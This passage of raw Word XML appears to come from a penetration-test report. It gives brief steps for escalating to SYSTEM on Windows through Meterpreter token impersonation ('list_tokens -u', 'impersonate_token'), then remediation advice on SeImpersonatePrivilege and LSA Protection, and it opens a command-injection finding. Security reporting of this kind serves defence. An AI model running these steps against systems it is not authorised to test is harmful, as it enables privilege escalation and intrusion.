          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Obtain a Meterpreter shell on the vulnerable system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="4FA78684" w14:textId="2B80E91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326701">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AC7E648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">List the available Delegation Tokens using </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AC7E648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>list_tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AC7E648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> –u</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AC7E648" w:rsidP="0D325B6E" w:rsidRDefault="5AC7E648" w14:paraId="0F260FB2" w14:textId="2948B387">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AC7E648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3: Impersonate NT AUTHORITY\SYSTEM using</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AC7E648">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63E692CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>impersonate_token</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63E692CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “NT AUTHORITY\SYSTEM”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="63E692CC" w:rsidP="0D325B6E" w:rsidRDefault="63E692CC" w14:paraId="7ACE1C77" w14:textId="6EEFC05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E692CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63E692CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63E692CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command to get a shell as the elevated user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="63E692CC" w:rsidP="0D325B6E" w:rsidRDefault="63E692CC" w14:paraId="6C3FBED4" w14:textId="75860D88">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E692CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: Type </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63E692CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="617A0F4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63E692CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to verify elevated privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3E0445D5" w14:textId="6772ABA4">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F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="2EF82790" w14:textId="5B40B96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326701">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F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="36C90CCC" w14:textId="7DF08D3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32670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F32670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1FEC36A" w:rsidP="0D325B6E" w:rsidRDefault="21FEC36A" w14:paraId="3865C1E3" w14:textId="79146D7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>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FEC36A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Group Policy to r</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="05F65BD6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">estrict </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="05F65BD6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="05F65BD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45F9906">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to only necessary, high-privileged users. Remove </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2BDFE2D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>impersonated</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="045F9906">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges from all service accounts and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0924A85F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">users that do not </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1FD63EF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explicitly</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0924A85F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> require it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6F408A20" w:rsidP="0D325B6E" w:rsidRDefault="6F408A20" w14:paraId="7410D2DE" w14:textId="2FB0409F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>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408A20">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure LSA Protection via Group Policy </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00A8020D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and enable Protected </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00A8020D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00A8020D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Light (PPL) to protect LSASS process memory from unauthorized access</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31434995">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799904AE" w14:textId="1A430169">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4F326701" w:rsidP="0D325B6E" w:rsidRDefault="4F326701" w14:paraId="5EE6A924" w14:textId="031451C6">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F32670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C398E24" w:rsidP="0D325B6E" w:rsidRDefault="0C398E24" w14:paraId="696C59DD" w14:textId="477DFB94">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R35f2280928d640fe">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0C398E24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">Microsoft </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="531D96C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">Learn </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0C398E24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>- Access Tokens</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C398E24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="06266D18" w:rsidP="0D325B6E" w:rsidRDefault="06266D18" w14:paraId="199E6BFF" w14:textId="63174174">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rdbffcf14db384e5b">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="06266D18">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">Microsoft </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="2B731A65">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">Learn </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="06266D18">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>- Configure LSA Protection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="06266D18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="53711D35" w14:textId="1F7B3D5D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DFD8035" w:rsidP="0D325B6E" w:rsidRDefault="4DFD8035" w14:paraId="50CD850E" w14:textId="07F54837">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1503722194" w:id="167763148"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4DFD8035">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4DFD8035">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc656415812" w:id="1384475960"/>
      <w:bookmarkStart w:name="_Toc389620861" w:id="2071399831"/>
      <w:bookmarkStart w:name="_Toc665319834" w:id="2129334915"/>
      <w:bookmarkStart w:name="_Toc867834286" w:id="1833807986"/>
      <w:bookmarkStart w:name="_Toc1797989163" w:id="1779764381"/>
      <w:bookmarkStart w:name="_Toc1963407326" w:id="1729421489"/>
      <w:bookmarkStart w:name="_Toc438791725" w:id="1895584566"/>
      <w:bookmarkStart w:name="_Toc1122298783" w:id="637458125"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1CF5FC06">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1729421489"/>
      <w:bookmarkEnd w:id="1895584566"/>
      <w:bookmarkEnd w:id="637458125"/>
      <w:bookmarkEnd w:id="1384475960"/>
      <w:bookmarkEnd w:id="2071399831"/>
      <w:bookmarkEnd w:id="2129334915"/>
      <w:bookmarkEnd w:id="1833807986"/>
      <w:bookmarkEnd w:id="1779764381"/>
      <w:bookmarkEnd w:id="16776314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5055540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930CCA" w14:textId="41595FBB">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2650FD" w14:textId="5C16B460">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4E83A6" w14:textId="3A8A0BD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065613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713D69" w14:textId="0FE9B8F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C1CB908" w14:textId="2B157082">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08910195" w14:textId="0496D693">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9</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="4CDA696E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
